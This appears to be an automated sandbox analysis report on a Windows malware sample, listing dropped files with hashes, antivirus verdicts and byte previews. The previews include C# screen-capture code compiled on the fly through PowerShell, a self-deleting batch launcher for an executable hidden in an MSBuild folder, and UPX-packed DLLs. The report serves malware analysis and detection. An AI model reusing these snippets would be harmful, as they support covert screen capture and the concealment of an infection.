                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                  MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                  SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                  SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                  SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                  Malicious:false
                                                                                                  Preview:@...e.................................&..............@..........
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):672852
                                                                                                  Entropy (8bit):7.923034694323039
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:mVeAAv2LReLVHg/7wrGWfpc6THJvOocm4yE9EoFxHvA/F+M1ccKakS:Kv8gReLVHY7y3fxVvOoZ+HA8M1oakS
                                                                                                  MD5:35EAF361DBF4297DFCCF215E8BF1B610
                                                                                                  SHA1:28335B0AFB851CD9F34C45963CC1EF4D51FD95F2
                                                                                                  SHA-256:3F90881C688845CF94EA03697FF7D6637EC300F326752B437EFAA8C1CB487809
                                                                                                  SHA-512:9D687437F7134B2606EBCCADDB6C272C3055EC7E0672273D1C75D5855839CCA5BDE52F24F93E9F5E622357C8393EDD492BBCC7728FB5A68B222EF7D4781846EA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G....y....;.5.....U.=3...o.Q..y.$. <T.].AB./...$......G.".t.H.. &.....#..2w.#..Z...."..<.B.Y_...s..i.<>....s..Q......I.......Y0./.O.....>.h?.oBf*..{M..8.9f....I..>\`..4.......|..E1..'..8|.J....b.....t....a.c..{..#.9.G....s.M..G...../...i.Y$...(f......;.J......{n_4.w..2.....n.G....e..".......`.m......y.M......?...7-....l(..3.{C.7.....7.E.}..-.........^?.........z..}.[....u...k..~m;.Z.z.y.5s...._3..;..J..^.V....1...3/....|......X...k...zE.$s..i....9.=39?{H....xf.K.Y...../+h=s..ml.K.N...g.|i.}.%..bU...[y.e%........r.0..{..if.KRw..Sg.......cZ...W.tyZ.kV.q%.\...<..}a....t.Y_F....c.!.+..8../...zv...{}...ml......s..k.W..........2......f.:?u.<..5../.V.;{.[.V..b......H.......?...(....3..{>s.....\.{...9..|f.s........3.0..........]...|n...2_.[...b...n.c.+w....t.{.W...s;..y.z.N.n.....s...q.@n.n.w.c^.....Y....%.Z}..EN..3V.
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1004
                                                                                                  Entropy (8bit):4.154581034278981
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                  MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                  SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                  SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                  SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                  Malicious:false
                                                                                                  Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):607
                                                                                                  Entropy (8bit):5.367252340551585
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfkWZEifXx:V3ka6KOkqeFkOfFEifXx
                                                                                                  MD5:D3E546274680FADD8E071EE7F523249F
                                                                                                  SHA1:D5772872A693367F7ABC2544F9C80CCF2EDE80D5
                                                                                                  SHA-256:EF88CB14E815EE0E0B7A7A2103BFB4D84FF3FF220C149D1AF2B200172258AA9D
                                                                                                  SHA-512:0BBC15DB875EDD705791460AFBCEEC9B4BD71DB3DCA60C34AC0D3ADE78B26CA9CC9DCC0860920834B6EE30EA36D3D592E5C5EC100C3B4078D45AA4DDED4E1A90
                                                                                                  Malicious:true
                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.0.cs"
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4096
                                                                                                  Entropy (8bit):3.164512611044669
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:6Dc7oEAtf0KhzBU/Qf6mtJvN0ptpW1ulfYa3sXq:sNz0fmnOPdYKs
                                                                                                  MD5:EEF624FFB707F1AE311D968494F4EDBE
                                                                                                  SHA1:6DDB54F928BC8B7F22982295FEC7D8B2C6490E95
                                                                                                  SHA-256:038E45271BC8B5E42C1DB5374835AFD159CC19D7269AAC8FC7E0387C2B374B2E
                                                                                                  SHA-512:3064650F3E853C2B484D1823927B4796D50A986024352E398FB24995520068CDA9CF7EAEAD74DBC54DF7CFBDD72F9FCA26886D78D03CEA54E6306F85128937DA
                                                                                                  Malicious:true
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):1149
                                                                                                  Entropy (8bit):5.520247775191603
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:KJfNI/Id3ka6KOkqeFkOfFEifXUKax5DqBVKVrdFAMBJTH:uNI/kka6NkqeFkyFEuXUK2DcVKdBJj
                                                                                                  MD5:6355D9AC9A7C767F555529A18F667406
                                                                                                  SHA1:E15DDC54BA7B38F5AE227CEF4EC03B2D43A59A6B
                                                                                                  SHA-256:89BEC08D3A3F17FEC8EBB56CA219176094195613252BC6108B86278EE3B14449
                                                                                                  SHA-512:013720A1A76C8A5A73BFE780D2329038F6CE927A6EB34122F2FBF6746EE7DD70D50A2F815611159EFB07C961CAA2421406C55AEF5419EE7953B0705EA11DD983
                                                                                                  Malicious:false
                                                                                                  Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  File Type:MSVC .res
                                                                                                  Category:dropped
                                                                                                  Size (bytes):652
                                                                                                  Entropy (8bit):3.1009853876306326
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNYak7YnqqsNPN5Dlq5J:+RI+ycuZhNfYakSsNPNnqX
                                                                                                  MD5:9502A89DECABA7AD8DEBDFFD0CE8B663
                                                                                                  SHA1:D059F94751248C5E47BAF47929FBC96DCC2A7DEC
                                                                                                  SHA-256:6FD6E4854CC740C24FBCAB96F87333A8DB2F699FBB3D00C15624E419578C8359
                                                                                                  SHA-512:ABAE10785558744F4C5ABE2E729A1B060F5C630D83CDAD0A62C0E8C744C01CABB772A883B2E9C85D2128DCA7F7C000FA5E9C8A2DBF6BB33644BDF29533A7A79C
                                                                                                  Malicious:false
                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.k.u.g.0.k.j.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.k.u.g.0.k.j.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):255
                                                                                                  Entropy (8bit):5.2198510638264
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XmrKKOZG1wkn23fL/Ekh:HTg9uYDEarV1Xmrgfwkh
                                                                                                  MD5:4C481E12A345F8031B1C15FF8D4A0109
                                                                                                  SHA1:3FF762B415EA2E64F6841E005DD40BF629ACDADF
                                                                                                  SHA-256:D9899BA679E61769E56B5F1FF631EB65951CAC1A1EEE3B4F6F936686B2F8198F
                                                                                                  SHA-512:F8BBF339EC187838AAA45BF1606880C56EC544456FF217191DEC352386BE9398D3B19B2CE2F66A07A47B0D5519B40DDAA03793DCC6BA9DAED788F902D7289470
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\E9LXmGxXsL.bat"
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25
                                                                                                  Entropy (8bit):4.1834651896016455
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:hjUwKAuLecPjLn:hgwhut
                                                                                                  MD5:9E58D6A3B07A2DD17F52EA3B9400C3AD
                                                                                                  SHA1:A6A85B9B972D0B781D5DD8DB10B889A6E6E48ADE
                                                                                                  SHA-256:6DD18FCCB53F77DA059D2E0C9D80AF01182A0DB5C24A3890F9198A1CF9743632
                                                                                                  SHA-512:96A3E22D2EC27DA667487ED7FAA8A28007BE3C2F637AD81BC216E12798E77E11F6E2EBA800C1361A6CA23A315444A90EBAA9DAF73BEB95532356077D4F1A912D
                                                                                                  Malicious:false
                                                                                                  Preview:d0YFSFUDUoN1KDxmyD6GzQjFn
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Aug 1 23:29:42 2024, 1st section name ".debug$S"
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1372
                                                                                                  Entropy (8bit):4.138578893019934
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:HJwq9s+fZsUDfHmQwKefNnmNII+ycuZhNfYakSsNPNnqS+d:pRqSOKCNmu1ulfYa3sXqSe
                                                                                                  MD5:C59AADE4C45538715E3FC734F043D537
                                                                                                  SHA1:E743AA2EC6AA4300A77E6CBC262D2999A9FBEBCC
                                                                                                  SHA-256:230A6EEEF7C94D6A172F7AADC3AD2885326501B1CF96FDB8E26AE4009DA162E1
                                                                                                  SHA-512:2F8825BD0923C7CCB2F20A9CFBCD5F8566C2FA0960539030C7AAAE45EC947A020E1F5EFC732E4B19D000BD33CECA88AC5405392D36D25EAB58472B7F0187AC6F
                                                                                                  Malicious:false
                                                                                                  Preview:L...f..f.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP...........................c..........4.......C:\Users\user\AppData\Local\Temp\RES46F0.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.k.u.g.0.k.j.4...d.l.l.....(.....L.e.g.a.
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x704, 10 symbols, created Thu Aug 1 23:29:46 2024, 1st section name ".debug$S"
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1980
                                                                                                  Entropy (8bit):4.588871369211372
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Hwjm9+XOlDfHDwKRfCWYN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+SUZ:f50KJCWYyluOulajfqXSfbNtmh9Z
                                                                                                  MD5:7D8DAEE1881B7CB65AE18E171BFD0248
                                                                                                  SHA1:6C12B133D8BBFAE628AE98C7AA7A3D93C7A53734
                                                                                                  SHA-256:431DD4EA8894836688039DC61B43CD82ADE990686F09105791ABC2CC1C7260C7
                                                                                                  SHA-512:8D0C18AA1F3C6F96534A5F0DD74FA45B2E81F39B76FB7523AE5B93344B8C8F49EA035D0CE50F322B1398C3415736F815598CE909A57F4DEF05FD6AD7FCA8D031
                                                                                                  Malicious:false
                                                                                                  Preview:L...j..f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........p...................@..@........<....c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES541F.tmp.-.<....................a..Microsoft (R) CVTRES.}.=..cwd.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.
                                                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):98224
                                                                                                  Entropy (8bit):6.452201564717313
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                  MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                  SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                  SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                  SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46064
                                                                                                  Entropy (8bit):7.796865894568779
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:V3CnjEFEHH57WfWzAPpIe7zOsupVPW9zxtrXhcwKnXffpI3IvtVHeDYiSyv6RqeA:V6jEFO7WffITsMw9vrxcpnPq3IvtVHs9
                                                                                                  MD5:C24B301F99A05305AC06C35F7F50307F
                                                                                                  SHA1:0CEE6DE0EA38A4C8C02BF92644DB17E8FAA7093B
                                                                                                  SHA-256:C665F60B1663544FACF9A026F5A87C8445558D7794BAFF56E42E65671D5ADC24
                                                                                                  SHA-512:936D16FEA3569A32A9941D58263E951623F4927A853C01EE187364DF95CD246B3826E7B8423AC3C265965EE8E491275E908AC9E2D63F3ABC5F721ADD8E20F699
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>..m..m..m..=m..m...l..m..Sm..m...l..m...l..m...l..mf..l..mt..l..m..m..mf..l..mf..l..mf.Qm..mf..l..mRich..m........................PE..d....(.b.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):56816
                                                                                                  Entropy (8bit):7.830032396611692
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:z4eSBuhlC82gmmCm7jDCxU6esTzvIvQPnY7Syp96:kPAH4gZT7qxU6vTbIvQPnYv96
                                                                                                  MD5:5C0BDA19C6BC2D6D8081B16B2834134E
                                                                                                  SHA1:41370ACD9CC21165DD1D4AA064588D597A84EBBE
                                                                                                  SHA-256:5E7192C18AD73DAA71EFADE0149FBCAF734C280A6EE346525EA5D9729036194E
                                                                                                  SHA-512:B1B45FCBB1E39CB6BA7AC5F6828EE9C54767EABEEDCA35A79E7BA49FD17AD20588964F28D06A2DCF8B0446E90F1DB41D3FCA97D1A9612F6CC5EB816BD9DCDF8A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3c..3c..3c..K...3c..Fb..3c..Ff..3c..Fg..3c..F`..3c..Fb..3c..Ag..3c..Ab..3c.HZb..3c..3b.:3c..Fn..3c..Fc..3c..F...3c..Fa..3c.Rich.3c.........PE..d....(.b.........." .............p...........................................@............`.........................................H<.......9.......0.......................<.......................................&..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):105456
                                                                                                  Entropy (8bit):7.934837610567248
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:oLDiGfp+9JSNhsyzp72hnyE8E24ZllDUD1RPC/J3KPKu8URMIv5q5pM7SyqL:owcV0nyE32kvDUhRa1uHqIv5q5pMsL
                                                                                                  MD5:604154D16E9A3020B9AD3B6312F5479C
                                                                                                  SHA1:27C874B052D5E7F4182A4EAD6B0486E3D0FAF4DA
                                                                                                  SHA-256:3C7585E75FA1E8604D8C408F77995B30F90C54A0F2FF5021E14FA7F84E093FB6
                                                                                                  SHA-512:37CE86FD8165FC51EBE568D7CE4B5EA8C1598114558D9F74A748A07DC62A1CC5D50FE1448DDE6496EA13E45631E231221C15A64CEBBB18FA96E2F71C61BE0DB4
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...V...V...V......V..W...V..S...V..R...V..U...V.a.W...V.s.W...V...W.;.V.a.U...V.a.[...V.a.V...V.a.....V.a.T...V.Rich..V.........PE..d...q(.b.........." .....p................................................... ............`.............................................P........................'......................................................8...........................................UPX0....................................UPX1.....p.......f..................@....rsrc................j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33264
                                                                                                  Entropy (8bit):7.645283646866556
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:rzmfA5r8DJk6cG5pq+Iv5IiyYiSyvUqbIteE+K:rzmG8DJkV+Iv5Iiy7Syif
                                                                                                  MD5:8BA5202E2F3FB1274747AA2AE7C3F7BF
                                                                                                  SHA1:8D7DBA77A6413338EF84F0C4DDF929B727342C16
                                                                                                  SHA-256:0541A0028619AB827F961A994667F9A8F1A48C8B315F071242A69D1BD6AEAB8B
                                                                                                  SHA-512:D19322A1ABA0DA1AA68E24315CDBB10D63A5E3021B364B14974407DC3D25CD23DF4FF1875B12339FD4613E0F3DA9E5A78F1A0E54FFD8360ED764AF20C3ECBB49
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........SQ..2?..2?..2?..J...2?.G>..2?.G:..2?.G;..2?.G<..2?.+G>..2?.9@>..2?.jK>..2?..2>.l2?.+G2..2?.+G?..2?.+G...2?.+G=..2?.Rich.2?.........PE..d....(.b.........." .....P..........p/.......................................P............`..........................................K..P....I.......@.......................K......................................p;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):84976
                                                                                                  Entropy (8bit):7.919746609337062
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:fZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfo0Dm8wIve1M77Syi7:v7HdSpd+co4AhRiXT0DiIve1M7c7
                                                                                                  MD5:215ACC93E63FB03742911F785F8DE71A
                                                                                                  SHA1:D4E3B46DB5D4FCDD4F6B6874B060B32A4B676BF9
                                                                                                  SHA-256:FFDBE11C55010D33867317C0DC2D1BD69F8C07BDA0EA0D3841B54D4A04328F63
                                                                                                  SHA-512:9223A33E8235C566D280A169F52C819A83C3E6FA1F4B8127DDE6D4A1B7E940DF824CCAF8C0000EAC089091FDE6AE89F0322FE62E47328F07EA92C7705ACE4A72
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J..G.......A.......H.......K.......@......@......A...C...&......y......B......B......B...RichC...........................PE..d....(.b.........." ..... ................................................................`.........................................4...L....................@..........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23536
                                                                                                  Entropy (8bit):7.403882539076591
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:PVOBO+iv3GmArtK6qsriOU3c4KFPsZa7gJXxeMIv7UiNqIYiSy1pCQe9g4i/8E9x:dOa1OtK/sriO2Q0phlIv7UixYiSyvcgB
                                                                                                  MD5:7B9F914D6C0B80C891FF7D5C031598D9
                                                                                                  SHA1:EF9015302A668D59CA9EB6EBC106D82F65D6775C
                                                                                                  SHA-256:7F80508EDFF0896596993BF38589DA38D95BC35FB286F81DF361B5BF8C682CAE
                                                                                                  SHA-512:D24C2FF50649FE604B09830FD079A6AD488699BB3C44EA7ACB6DA3F441172793E6A38A1953524F5570572BD2CF050F5FEE71362A82C33F9BB9381AC4BB412D68
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
